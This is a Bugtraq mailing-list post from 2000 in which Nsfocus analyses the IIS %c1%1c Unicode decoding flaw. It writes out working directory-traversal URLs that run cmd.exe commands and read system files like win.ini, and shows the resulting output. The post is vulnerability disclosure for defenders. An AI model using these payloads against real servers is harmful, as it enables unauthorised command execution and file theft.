Bugtraq mailing list archives
Re: IIS %c1%1c remote command execution
From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 18 Oct 2000 15:35:31 +0800
We found this bug several weeks ago. When we are ready to report it to Microsoft , we found it has been posted in BugTraq. A member of our team disassembled the IIS 5.0 (Chinese version) Unicode decoding implementation, he found a strange decoding method when IIS found "%c1%hh" and "%c0%hh" (0x00<= 0xhh < 0x40) IIS will decode "%c1%hh" to (0xc1 -0xc0) * 0x40 + 0xhh. IIS will decode "%c0%hh" to (0xc0 -0xc0) * 0x40 + 0xhh. example (Windows 2000 + IIS 5.0 + SP1 for Simplify Chinese version): http://192.168.8.48/A.ida/%c1%00.ida IIS said"@.ida" can't be found here: (0xc1-0xc0)*0x40+0x00=0x40='@' http://192.168.8.48/A.ida/%c1%01.ida IIS said "A.ida" can't be found here: (0xc1-0xc0)*0x40+0x01=0x41='A' http://192.168.8.48/A.ida/%c1%02.ida IIS said "B.ida" can't be found .... http://192.168.8.48/A.ida/%c0%21.ida IIS said "!.ida" can't be found ... It means you can encode most characters with this feature. For example: %c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' We guess that we can use it to bypass some directory restriction: (1) http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir Now we get: Directory of d:\inetpub\scripts 2000-09-28 15:49 <DIR> . 2000-09-28 15:49 <DIR> .. 1999-07-21 17:49 147,456 Count.exe 2000-09-12 17:08 438,290 Count25.exe 2000-10-13 15:03 8,867 counter.err 2000-08-23 23:07 160,002 counter.exe 1999-05-25 18:14 3,925 CountNT.html 1999-07-21 17:49 64,512 extdgts.exe 2000-08-10 15:24 46,352 ism.dll 1999-07-21 17:49 64,512 mkstrip.exe 1999-05-25 18:18 1,317 README.txt 2000-09-28 15:49 <DIR> wcount 9 File(s) 935,233 bytes (2) we can get the content of some system files with this bug too: http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini IIS deems it to be a request for a .ASP file.It will call asp.dll to open the file win.ini. For IIS 4.0+SP6(Chinese), the URL above failed. It seems that IIS is getting smarter. But we found it is interesting that we can use this malformed URL to trick IIS to get the winnt.ini: http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini "default.asp" should be an existing .ASP file. "a.exe" is random .EXE file name. It can be a nonexisting file. It looks IIS 4.0/5.0 for English version has different decoding implementation. ---Original Message---
Recently I received an email from Par Osterberg that directed my attention to a post in the Packetstorm forums: http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=Windows&mesgcheck=defined&gum=474&editoron=
[...]
- rain forest puppy
Regards, Nsfocus Security Team <security () nsfocus com> http://www.nsfocus.com
Current thread:
- IIS %c1%1c remote command execution rain forest puppy (Oct 17)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)
- Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
- [LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution ET LoWNOISE (Oct 20)
- Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
- <Possible follow-ups>
- Re: IIS %c1%1c remote command execution Nsfocus Security Team (Oct 18)
- Re: IIS %c1%1c remote command execution Cris Bailiff (Oct 19)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)